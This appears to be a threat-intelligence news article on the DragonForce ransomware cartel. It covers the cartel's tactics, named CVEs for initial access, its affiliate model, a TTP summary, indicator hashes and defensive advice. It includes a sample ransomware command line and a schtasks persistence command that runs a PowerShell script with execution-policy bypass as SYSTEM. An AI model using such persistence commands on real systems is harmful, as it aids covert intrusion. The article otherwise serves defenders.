DragonForce Ransomware Cartel Hits 120+ Victims Over Past Year

The threat landscape of 2025 is shaped not only by relentless malware but also by the emergence of new organizational models among cybercriminals.

One of the most notable developments is the rise of the DragonForce ransomware cartel a threat actor that has pivoted from traditional Ransomware-as-a-Service (RaaS) to a full-scale cartel, providing infrastructure and operational tools for affiliates.

Here, we explore the technical elements behind DragonForce’s success and its implications for defenders.

Technical Architecture and Tactics

Ransomware Payload and Operational Modes

DragonForce started making headlines in late 2023, leveraging variants reminiscent of LockBit 3.0 but later evolving to use the Conti ransomware family. This group is known for their Windows encryptor, which supports:

• Partial, full, and header encryption: Allows customization per target or data sensitivity.
• Selective folder encryption and log obfuscation: Encrypts only critical or high-value directories, making detection harder and maximizing impact.
• Filename encryption: Adds another layer of obfuscation during incident response.

Example of Ransomware Execution (Windows)

textdragonforce.exe --target "C:\SensitiveData" --mode full --encrypt-logs

The group’s ransomware is cross-platform, targeting Windows, Linux, and ESXi systems, with improvements inspired by public decryption research (notably Akira’s GPU-based decryptor). This flexibility ensures a wide attack surface in organizations running heterogeneous IT infrastructures.

Initial Access, Persistence, and Lateral Movement

Initial Access:
DragonForce operators typically gain initial footholds through:

• Phishing and social engineering (sometimes impersonating IT staff).
• Exploiting unpatched vulnerabilities, including:
  • CVE-2024-21412 (Windows SmartScreen bypass)
  • CVE-2024-21887 (Ivanti Connect Secure)
  • CVE-2024-21893 (Another Ivanti vulnerability)

Persistence:
Once inside, the group relies on “Living Off the Land” (LOTL) techniques to evade detection, commonly using:

• Schtasks.exe and Taskkill.exe for scheduled tasks and disabling security tools.
• PowerShell scripts to alter system and power settings.

Lateral Movement:
DragonForce abuses legitimate Remote Monitoring and Management (RMM) tools like SimpleHelp normally trusted by IT teams—to pivot across networks without raising alarms. The malware can also propagate through removable media.

Example PowerShell Persistence Command

powershellschtasks /create /tn "DFUpdater" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\df_task.ps1" /sc onlogon /ru SYSTEM

Command and Control (C2):
Ingress Tool Transfer tactics are used to import additional tools, often leveraging FTP, Certutil.exe, or direct PowerShell download commands.

Data Exfiltration and Extortion Infrastructure

DragonForce maintains a robust data leak site (DLS), where they list victims, stolen data sizes, and countdowns to public disclosure. They have streamlined public access by removing CAPTCHAs, likely aiming to enhance visibility and pressure on victims.

• Their DLS supports browsing file/folder structures of exfiltrated data and direct downloading.
• The cartel provides partners with infrastructure—blogs, file servers, client/admin panels, and automated work processes—an innovation over traditional RaaS, making entry easier for affiliates.

The Cartel Model and Its Security Implications

Cartel Versus Classic RaaS

Unlike classic RaaS groups, DragonForce offers affiliates 80% of profits while supplying the technical backbone required to manage campaigns. This cartel-like structure empowers partners but also allows DragonForce to:

• Control or terminate infrastructure access if affiliates act against cartel interests.
• Foster an expanding, loyal network seeking operational autonomy but willing to share ransom proceeds for turnkey capabilities.

They have actively targeted competitors (e.g., defacing Mamona, attempting to absorb RansomHub’s affiliates), signaling a ruthless approach to market dominance.

Tactics, Techniques, and Procedures (TTPS) Summary

• Initial access: Phishing, credential abuse, N-day/exploitable vulnerabilities
• Execution: Command-line, DLL hijacking, shared modules
• Persistence: Scheduled tasks, LOTL binaries, power management
• Evasion: Timestomping, modifying security tools, analysis evasion
• Lateral movement: RMM tool abuse, network share propagation, removable media
• C2: FTP, Certutil, PowerShell
• Impact: .dragonforce_encrypted extension, exfiltration, extortion

Indicators of Compromise (Sample SHA256 Hashes)

SHA256 
e1b147aa2efa6849743f570a3aca8390faf4b90aed490a5682816dd9ef10e473 
7126b9932dc0cdfe751340edfa7c4a14b69262eb1afd0530e6d1fdb2e25986dd
ba1be94550898eedb10eb73cb5383a2d1050e96ec4df8e0bf680d3e76a9e2429
88169b1d4778ed6c5fda97375efb5b9171ea52649c8715bb449801c39bce4ad4 
5c54bd1aa2abf024f53490b7d93101496b5842a5a81a51955fe7f1d5e4281409 
01f1e82d4c2b04a4652348fb18bb480396db2229c4fd22d2be1ea58e6bf4a570
312ca1a8e35dcf5b80b1526948bd1081fed2293b31d061635e9f048f3fe5eb83
d4de7d7990114c51056afeedb827d880549d5761aac6bdef0f14cb17c25103b3

Experts recommend multi-layered security: patch management, network and endpoint protection, multi-factor authentication, continuous monitoring, and behavioral analysis to catch LOTL-based attacks.

Bitdefender’s GravityZone PHASR and IntelliZone are cited as examples of proactive defense tools.

The DragonForce cartel’s evolution marks a significant shift in ransomware economics and technical playbooks. Organizations must shift from reactive controls to resilient, intelligence-driven defense if they hope to withstand this new breed of cybercriminal cartel.